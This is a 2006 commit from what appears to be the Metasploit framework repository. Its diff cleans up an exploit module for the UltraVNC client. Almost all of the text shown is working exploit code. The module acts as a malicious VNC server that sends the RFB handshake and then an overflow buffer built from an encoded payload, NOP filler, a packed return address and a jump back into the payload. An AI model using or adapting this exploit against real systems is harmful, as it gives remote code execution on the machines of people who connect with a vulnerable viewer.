module clean up for ultravnc_client.rb

git-svn-id: file:///home/svn/framework3/trunk@4204 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-12-14 22:39:58 +00:00
parent cfdd264f2d
commit 529b808fc9
1 changed files with 9 additions and 8 deletions

View File

@ -48,20 +48,21 @@ class Exploits::Windows::Vnc::Ultravnc_Client < Exploit::Remote
end end
def on_client_connect(client) def on_client_connect(client)
rfb = "RFB 003.006\n"
client.put(rfb)
end
def on_client_data(client)
return if ((p = regenerate_payload(client)) == nil) return if ((p = regenerate_payload(client)) == nil)
filler = make_nops(980 - payload.encoded.length) filler = make_nops(980 - payload.encoded.length)
rfb = "RFB 003.006\n"
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n" sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
sploit << payload.encoded + filler + [target.ret].pack('V') sploit << payload.encoded + filler + [target.ret].pack('V')
sploit << "PASSWORD" + [0xe8, -997].pack('CV') sploit << "PASSWORD" + [0xe8, -997].pack('CV')
client.put(rfb)
on_client_data(16)
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(sploit) client.put(sploit)